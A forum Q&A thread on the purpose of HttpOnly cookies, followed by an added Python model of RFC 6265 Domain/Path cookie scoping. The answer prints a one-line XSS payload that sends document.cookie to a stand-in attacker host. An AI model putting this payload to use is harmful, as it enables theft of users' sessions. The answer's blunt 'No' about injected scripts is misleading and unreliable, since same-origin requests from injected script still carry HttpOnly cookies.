
From what I understand, HttpOnly cookies cannot be read by client js but they are passed by the browser with any subsequent requests.

If an attacker is able to inject js in to a web page and makes a request to the endpoint, it would still go through because all cookies are passed along, correct?

What's the point of HttpOnly cookies?

Aravind

1 Answer

If an attacker is able to inject js in to a web page and makes a request to the endpoint, it would still go through because all cookies are passed along, correct?

No. The Domain and Path attributes define the scope of the cookie: which URLs the cookie should be sent to.

Check the section "Define where cookies are sent" here.

But without HttpOnly, an attacker is able to access the cookie value with js:

<script>document.location="http://Attacker'sIP/cookiestealer.php?c="+document.cookie;</script>
jlvaquero
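The Domain and Path scoping the answer refers to, and what HttpOnly does and does not control, as an added example that is not part of the original post: a small Python model of the RFC 6265 matching rules. It is simplified: Secure and SameSite are ignored, and a cookie set without a Domain attribute is treated as if Domain were the setting host (real browsers keep such cookies host-only); all cookie and URL values are constructed.

```python
# Added example (not from the original post): a small model of RFC 6265 cookie
# scoping. Domain and Path decide whether a cookie is attached to a request;
# HttpOnly only decides whether document.cookie exposes it. Values are constructed.
from dataclasses import dataclass
from urllib.parse import urlparse

@dataclass
class Cookie:
    name: str
    value: str
    domain: str            # host the cookie applies to, e.g. "app.example.com"
    path: str = "/"
    http_only: bool = False

def parse_set_cookie(header: str, request_host: str) -> Cookie:
    """Parse a Set-Cookie header value (Domain, Path and HttpOnly only)."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    c = Cookie(name.strip(), value.strip(), request_host.lower())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain" and val:
            c.domain = val.lstrip(".").lower()   # a leading dot is ignored
        elif key == "path" and val.startswith("/"):
            c.path = val
        elif key == "httponly":
            c.http_only = True
    return c

def domain_matches(host: str, cookie_domain: str) -> bool:
    """RFC 6265 5.1.3: exact match, or host is a subdomain of cookie_domain."""
    return host.lower() == cookie_domain or host.lower().endswith("." + cookie_domain)

def path_matches(req_path: str, cookie_path: str) -> bool:
    """RFC 6265 5.1.4: identical, or cookie_path is a directory prefix."""
    if req_path == cookie_path:
        return True
    if not req_path.startswith(cookie_path):
        return False
    return cookie_path.endswith("/") or req_path[len(cookie_path)] == "/"

def sent_with_request(c: Cookie, url: str) -> bool:
    """True when a browser attaches c to a request for url, whatever initiated it."""
    u = urlparse(url)
    return domain_matches(u.hostname or "", c.domain) and path_matches(u.path or "/", c.path)

def visible_to_script(c: Cookie) -> bool:
    """document.cookie omits HttpOnly cookies; that is all HttpOnly controls."""
    return not c.http_only
```

sent_with_request takes no account of who initiated the request; only visible_to_script depends on HttpOnly.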